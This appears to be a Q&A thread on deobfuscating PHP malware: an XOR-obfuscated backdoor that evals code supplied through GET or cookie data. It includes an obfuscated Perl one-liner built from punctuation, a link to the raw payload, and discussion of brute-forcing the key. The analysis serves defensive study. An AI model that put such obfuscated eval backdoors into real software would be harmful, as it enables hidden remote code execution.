Interesting! So it sounds like rather than a general backdoor (waiting for a message containing encrypted code to execute), it already has its encrypted code ($encrypted_string) and is just waiting for a key to decrypt it? — Robert, May 06 '14 at 17:41
Not quite, omitted due to the sheer size of it, `$encrypted_string` is generated by the mess of punctuation marks etc at the beginning of the code. Here's the binary contents that gets XOR'd by the `decrypt()` function: https://mega.co.nz/#!99kjFRKb!3wREhKavCVu_n15UItXRQhLhQLiIEKhtOxaoMTTD2ts We would want to get a copy of the key hopefully from the originating server log. Failing that we could brute force XOR the payload looking for a key that generates evaluable PHP. — deed02392, May 06 '14 at 20:57
I will add, however, that due to the fact the evaluated code is generated from direct XORing, the attackers could rewrite large portions of the code (up to however large the GET or COOKIE data can be or the current payload length, whichever is smallest) that is executed by knowing the payload data and determining the key that makes it XOR to new code. — deed02392, May 06 '14 at 21:02

score 1 · Answer 3 · answered May 01 '14 at 20:57

1

It's perl embedded within PHP for example copy and paste the following into a text:

''=~('(?{'.('.,)./}'^'^^@@[]').'"'.('@-:}/@@]}@.@]}.@,@^'^'/@]][(%$]+@/*]^%^,|').',$/})')

$ more perltest 
''=~('(?{'.('.,)./}'^'^^@@[]').'"'.('@-:}/@@]}@.@]}.@,@^'^'/@]][(%$]+@/*]^%^,|').',$/})')

$ perl perltest 
omg they know perl
$

I wish I had time to deob right now. I will come back around to it tomorrow. But in essence its code shoved inside of code.

answered May 01 '14 at 20:57

munkeyoto

8,682
16
31

1

I'm not sure that it is perl — as I mentioned in my answer if you execute it as PHP but echo the $d variable rather than eval it you get more valid PHP which seems to eval code from either a cookie or get parameter. – thexacre May 02 '14 at 09:38

How to deobfuscate this PHP malware?

3 Answers3

Linked

Related